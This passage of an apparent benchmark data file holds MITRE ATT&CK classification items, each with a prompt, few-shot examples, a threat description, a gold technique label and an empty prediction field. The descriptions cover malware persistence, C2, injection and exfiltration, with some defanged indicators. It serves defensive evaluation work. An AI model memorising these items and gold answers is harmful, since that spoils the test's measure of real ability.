names.\n\nExamples:\n- Text: Kessel can exfiltrate credentials and other information via HTTP POST request, TCP, and DNS.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n- Text: Doki has used Ngrok to establish C2 and exfiltrate data.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: TinyZBot contains functionality to collect information from the clipboard.\n\t - T1115: Clipboard Data\n", + "input": "APT38 has collected data from a compromised host.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Finally, Grandoreiro detects two virtual environments \u2013 VMWare via its special I/O port and Virtual PC via the vpcext instruction\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: Crimson contains a command to list processes.\n\t - T1057: Process Discovery\n- Text: CHOPSTICK includes runtime checks to identify an analysis environment and prevent execution on it.\n\t - T1497: Virtualization/Sandbox Evasion\n", + "input": "P8RAT can check the compromised host for processes associated with VMware or VirtualBox environments.", + "gold": "- T1497.001: Virtualization/Sandbox Evasion - System Checks", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT32 has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment.\n\t - T1204.002: User Execution - Malicious File\n- Text: Sidewinder has lured targets to click on malicious links to gain execution in the target environment.\n\t - T1204.001: User Execution - Malicious Link\n- Text: Last week, Unit 42 released a blog on a newly named threat group called DarkHydrus that we observed targeting government entities in the Middle East. The attack that we discussed in our previous publication involved spear-phishing to deliver a PowerShell payload we call RogueRobin; however, we are aware of DarkHydrus carrying out a credential harvesting attack in June 2018. It also appears that this an ongoing campaign, as we have evidence of previous credential harvesting attempts using the same infrastructure dating back to the Fall of 2017. The credential harvesting attacks used spear-phishing emails that contained malicious Microsoft Office documents that leveraged the \u201cattachedTemplate\u201d technique to load a template from a remote server. When attempting to load this remote template, Microsoft Office will display an authentication dialog box to ask the user to provide login credentials. When entered, these credentials are then sent to the C2 server, which allows DarkHydrus to collect the user account credentials. Based on Unit 42\u2019s analysis, DarkHydrus used the open-source Phishery tool to create two of the known Word documents used in these credential harvesting attacks. As discussed in our previous blog, this further strengthens DarkHydrus\u2019 use of the open source for their attack tools. A phishing attack to steal credentials like this is not new: US-CERT warned of the same technique by a different threat group in 2017. Based on this, we can reasonably presume this group will continue to carry out attacks against these kinds of targets in the Middle East in the near-future\n\t - T1566.001: Phishing - Spearphishing Attachment\n", + "input": "Octopus has relied upon users clicking on a malicious attachment delivered through spearphishing.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Agent Tesla can add itself to the Registry as a startup program to establish persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Turla established persistence by adding a Shell value under the Registry key \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\".\n\t - T1547.004: Boot or Logon Autostart Execution - Winlogon Helper DLL\n- Text: PowerSploit contains a collection of Privesc-PowerUp modules that can discover and replace/modify service binaries, paths, and configs.\n\t - T1543.003: Create or Modify System Process - Windows Service\n", + "input": "One persistence mechanism used by CozyCar is to set itself to be executed at system startup by adding a Registry value under one of the following Registry keys:
\"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\"
\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\"
\"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"
\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sliver can exfiltrate files from the victim using the \"download\" command.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: Bundlore uses the \"curl -s -L -o\" command to exfiltrate archived data to a URL.\n\t - T1048: Exfiltration Over Alternative Protocol\n- Text: CORALDECK has exfiltrated data in HTTP POST headers.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n", + "input": "Wizard Spider has exfiltrated domain credentials and network enumeration information over command and control (C2) channels.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT29 has used WinRM via PowerShell to execute command and payloads on remote hosts.\n\t - T1021.006: Remote Services - Windows Remote Management\n- Text: The malware platform can use Windows admin shares to move laterally.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: enables the Remote Desktop Protocol for persistence.\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n", + "input": "Wizard Spider has used Window Remote Management to move laterally through a victim network.", + "gold": "- T1021.006: Remote Services - Windows Remote Management", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sandworm Team has run the \"xp_cmdshell\" command in MS-SQL.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: Green Lambert can establish persistence on a compromised host through modifying the `profile`, `login`, and run command (rc) files associated with the `bash`, `csh`, and `tcsh` shells.\n\t - T1546.004: Event Triggered Execution - Unix Shell Configuration Modification\n- Text: uses cmd.exe to run commands for enumerating the host.\n\t - T1059: Command and Scripting Interpreter\n", + "input": "NETEAGLE allows adversaries to execute shell commands on the infected host.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sliver can support C2 communications over DNS.\n\t - T1071.004: Application Layer Protocol - DNS\n- Text: The backdoor determines its C2 server using a Domain Generation Algorithm (DGA) to construct and resolve a subdomain of avsvmcloud[.]com. The Update method is responsible for initializing cryptographic helpers for the generation of these random C2 subdomains. Subdomains are generated by concatenating a victim userId with a reversible encoding of the victims local machine domain name. The attacker likely utilizes the DGA subdomain to vary the DNS response to victims as a means to control the targeting of the malware. These subdomains are concatenated with one of the following to create the hostname to resolve\n\t - T1568: Dynamic Resolution\n- Text: A variant can force the compromised system to function as a proxy server.\n\t - T1090: Proxy\n", + "input": "Green Lambert can use DNS for C2 communications.", + "gold": "- T1071.004: Application Layer Protocol - DNS", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Siloscape mimics CExecSvc.exe privileges by impersonating its main thread and then calls NtSetInformationSymbolicLink on a newly created symbolic link to break out of the container. More specifically, it links its local containerized X drive to the host\u2019s C drive\n\t - T1611: Escape to Host\n- Text: Conti can discover files on a local system.\n\t - T1083: File and Directory Discovery\n- Text: can create a shortcut in the Windows startup folder for persistence.\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n", + "input": "Siloscape maps the host\u2019s C drive to the container by creating a global symbolic link to the host through the calling of \"NtSetInformationSymbolicLink\".", + "gold": "- T1611: Escape to Host", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PsExec has the ability to remotely create accounts on target systems.\n\t - T1136.002: Create Account - Domain Account\n- Text: Agent Tesla can collect account information from the victim\u2019s machine.\n\t - T1087.001: Account Discovery - Local Account\n- Text: Cobalt Strike can use PsExec to execute a payload on a remote host. It can also use Service Control Manager to start new services\n\t - T1569.002: System Services - Service Execution\n", + "input": "Elise executes \"net start\" after initial communication is made to the remote server.", + "gold": "- T1007: System Service Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Actors used Windows command shell commands to detect and avoid virtualization and analysis environments.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: may collect information the victim's anti-virus software.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: We have gathered three samples of the default loader associated with this group and extracted the following configurations: SHA256 of Sample Configuration 82779504d3fa0ffc8506ab69de9cb4d8f6415adbb11a9b8312828c539cf10190 LAUNCHER_ARGS=[\u2018\u2013host\u2019, \u2018www1.chrome-up[.]date:4443\u2019, \u2018-t\u2019, \u2018obfs3\u2019] db453b8de1a01a3e4d963847c0a0a45fb7e1a9b9e6d291c8883c74019f2fc91f LAUNCHER_ARGS=[\u2018\u2013host\u2019, \u2018www1.chrome-up[.]date:4443\u2019, \u2018-t\u2019, \u2018obfs3\u2019] 7e57e35f8fce0efc3b944a7545736fa419e9888514fcd9e098c883b8d85e7e73 LAUNCHER_ARGS=[\u2018\u2013host\u2019, \u2018139.59.46[.]154:3543\u2019, \u2018-t\u2019, \u2018obfs3\u2019] These configurations show that this group uses both fully-qualified domain names and IP addresses to host their Pupy C2 servers\n\t - T1016: System Network Configuration Discovery\n\t - T1102: Web Service\n\t - T1008: Fallback Channels\n", + "input": "SUNBURST checked the domain name of the compromised host to verify it was running in a real environment.", + "gold": "- T1497.001: Virtualization/Sandbox Evasion - System Checks", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The Gamaredon group uses a package that includes a custom Microsoft Outlook Visual Basic for Applications (VBA) project. Using Outlook macros to deliver malware is something we rarely see while investigating malicious campaigns\n\t - T1106: Native API\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n\t - T1120: Peripheral Device Discovery\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: Carberp has queued an APC routine to explorer.exe by calling ZwQueueApcThread.\n\t - T1055.004: Process Injection - Asynchronous Procedure Call\n- Text: The phishing messages were found to contain a Microsoft Word document attachment that uses VBA macros to install\u202fLookBack malware. When the attachment is executed, the malicious VBA macro within the Microsoft Word attachment drops three Privacy Enhanced Mail (PEM) files to the host: tempgup.txt, tempgup2.txt, and tempsodom.txt. Additionally, the file\u202fTemptcm.tmp,\u202fwhich is a version of certutil.exe,\u202fis dropped to decode the PEM files using\u202fTemptcm.tmp. The macro next creates a copy of the decoded PEM files restoring their proper file extensions with the Windows essentuti.exe. Finally, the macro launches GUP.exe and the libcurl.dll loader separately, resulting in the execution of\u202fLookBack\u202fmalware\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", + "input": "SUNBURST used Rundll32 to execute payloads.", + "gold": "- T1218.011: System Binary Proxy Execution - Rundll32", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Stuxnet used WMI with an \"explorer.exe\" token to execute on a remote share.\n\t - T1047: Windows Management Instrumentation\n- Text: POSHSPY uses PowerShell to execute various commands, one to execute its payload.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Okrum's loader can check the amount of physical memory and terminates itself if the host has less than 1.5 Gigabytes of physical memory in total.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", + "input": "PowerSploit's \"Invoke-WmiCommand\" CodeExecution module uses WMI to execute and retrieve the output from a PowerShell payload.", + "gold": "- T1047: Windows Management Instrumentation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BlackTech has used the SNScan tool to find other potential targets on victim networks.\n\t - T1046: Network Service Discovery\n- Text: TeamTNT has scanned for vulnerabilities in IoT devices and other related resources such as the Docker API.\n\t - T1595.002: Active Scanning - Vulnerability Scanning\n- Text: SILENTTRINITY can enumerate and collect the properties of domain computers.\n\t - T1018: Remote System Discovery\n", + "input": "Fox Kitten has used tools including NMAP to conduct broad scanning to identify open ports.", + "gold": "- T1046: Network Service Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Egregor has checked for the LogMein event log in an attempt to encrypt files in remote machines.\n\t - T1219: Remote Access Software\n- Text: LightNeuron exfiltrates data over its email C2 channel.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: uses AES to encrypt network communication.\n\t - T1573: Encrypted Channel\n", + "input": "Kimsuky has used a modified TeamViewer client as a command and control channel.", + "gold": "- T1219: Remote Access Software", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has performed timestomping on victim files.\n\t - T1070.006: Indicator Removal - Timestomp\n- Text: drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim.\n\t - T1092: Communication Through Removable Media\n- Text: Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands. Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim\u2019s data\n\t - T1027: Obfuscated Files or Information\n\t - T1560: Archive Collected Data\n", + "input": "APT28 has performed timestomping on victim files.", + "gold": "- T1070.006: Indicator Removal - Timestomp", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ZxxZ has relied on victims to open a malicious attachment delivered via email.\n\t - T1204.002: User Execution - Malicious File\n- Text: APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel (XLSM) files to deliver their initial exploits\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Ember Bear has sent spearphishing emails containing malicious links.\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "KGH_SPY has been spread through Word documents containing malicious macros.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cuba can use the function \"GetIpNetTable\" to recover the last connections to the victim's machine.\n\t - T1049: System Network Connections Discovery\n- Text: Registry key \u201cSoftware\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\\u201d is queried to gather proxy information with values ProxyEnable, Proxy: (NO), Proxy, ProxyServer\n\t - T1090: Proxy\n\t - T1012: Query Registry\n- Text: jRAT can list and manage startup entries.\n\t - T1037.005: Boot or Logon Initialization Scripts - Startup Items\n", + "input": "jRAT can list network connections.", + "gold": "- T1049: System Network Connections Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: T9000 gathers and beacons the username of the logged in account during installation. It will also gather the username of running processes to determine if it is running as SYSTEM.\n\t - T1033: System Owner/User Discovery\n- Text: HyperStack sets the registry key HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA\\Restrict Anonymous value to 0 so anonymous logon users (i.e. null session connections) can list all account names and enumerate all shared resources on a remote share. The implant can then use the WNetAddConnection2 API call to connect to another remote device's IPC$ share. IPC$ is a share that facilitates inter-process communication (IPC) by exposing named pipes to write to or read from\n\t - T1087.001: Account Discovery - Local Account\n- Text: has used net time to check the local time on a target system.\n\t - T1124: System Time Discovery\n", + "input": "Agent Tesla can collect the username from the victim\u2019s machine.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can install encrypted configuration data under the Registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\laxhost.dll and HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs.\n\t - T1112: Modify Registry\n- Text: provides access to the Windows Registry, which can be used to gather information.\n\t - T1012: Query Registry\n- Text: Gazer can establish persistence by setting the value \u201cShell\u201d with \u201cexplorer.exe, %malware_pathfile%\u201d under the Registry key \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\".\n\t - T1547.004: Boot or Logon Autostart Execution - Winlogon Helper DLL\n", + "input": "Ursnif has used Registry modifications as part of its installation routine.", + "gold": "- T1112: Modify Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The dropped file is executed after terminating any process with the same name. For persistence, it adds a shortcut for the file at the %STARTUP% directory\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: The .zip archive attached to the email contains a Windows shortcut (.lnk) file with the Microsoft Internet Explorer logo\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: Ahnlab, a South Korean software company, simultaneously published a paper regarding Bisonal's activity in South Korea. In this case, the infection vector has changed from previous samples. The initial stage is a binary that drops a decoy document (Powerpoint or Excel document), a VisualBasic script and the packed Bisonal payload. The payload is dropped with a .jpg extension that's been renamed to \".exe. The payload has been packed with a new packer. The code of Bisonal is similar to the version of 2019\n\t - T1137.006: Office Application Startup - Add-ins\n", + "input": "ThreatNeedle can be loaded into the Startup folder (`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\OneDrives.lnk`) as a Shortcut file for persistence.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Micropsia obfuscates the configuration with a custom Base64 and XOR.\n\t - T1027: Obfuscated Files or Information\n- Text: uses a custom packing algorithm.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: Turian can insert pseudo-random characters into its network encryption setup.\n\t - T1001.001: Data Obfuscation - Junk Data\n", + "input": "VERMIN is obfuscated using the obfuscation tool called ConfuserEx.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: No matching sample found for T1055.005\n- Text: Wizard Spider has injected malicious DLLs into memory with read, write, and execute permissions.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: Astaroth can create a new process in a suspended state from a targeted legitimate process in order to unmap its memory and replace it with malicious code.\n\t - T1055.012: Process Injection - Process Hollowing\n", + "input": "Ursnif has injected code into target processes via thread local storage callbacks.", + "gold": "- T1055.005: Process Injection - Thread Local Storage", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: QuasarRAT can communicate over a reverse proxy using SOCKS5.\n\t - T1090: Proxy\n- Text: SDBbot has the ability to communicate with C2 with TCP over port 443.\n\t - T1095: Non-Application Layer Protocol\n- Text: While both malware families are designed to deploy Cobalt Strike Beacon, there are differences in Cobalt Strike configuration. To date, Symantec has seen four samples of Raindrop. In three cases, Cobalt Strike was configured to use HTTPS as a communication protocol. In the fourth it was configured to use SMB Named Pipe as a communication protocol\n\t - T1090.001: Proxy - Internal Proxy\n", + "input": "Aria-body has the ability to use a reverse SOCKS proxy module.", + "gold": "- T1090: Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: No matching sample found for T1574.004\n- Text: Empire contains modules that can discover and exploit unquoted path vulnerabilities.\n\t - T1574.009: Hijack Execution Flow - Path Interception by Unquoted Path\n- Text: Empire contains modules that can discover and exploit search order hijacking vulnerabilities.\n\t - T1574.008: Hijack Execution Flow - Path Interception by Search Order Hijacking\n", + "input": "Empire has a dylib hijacker module that generates a malicious dylib given the path to a legitimate dylib of a vulnerable application.", + "gold": "- T1574.004: Hijack Execution Flow - Dylib Hijacking", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LAPSUS$ has gathered detailed information of target employees to enhance their social engineering lures.\n\t - T1589: Gather Victim Identity Information\n- Text: Threat Group-1314 actors used compromised domain credentials for the victim's endpoint management platform, Altiris, to move laterally.\n\t - T1078.002: Valid Accounts - Domain Accounts\n- Text: This investigation allowed us to create strong ties between multiple campaigns that Lazarus has conducted, reinforcing our attribution. In this campaign the Lazarus group demonstrated its sophistication level and ability to circumvent the security measures they face during their attacks, such as network segmentation. We assess that Lazarus is a highly prolific group, conducting several campaigns using different strategies\n\t - T1585.002: Establish Accounts - Email Accounts\n", + "input": "During Operation Wocao, threat actors targeted people based on their organizational roles and privileges.", + "gold": "- T1589: Gather Victim Identity Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible 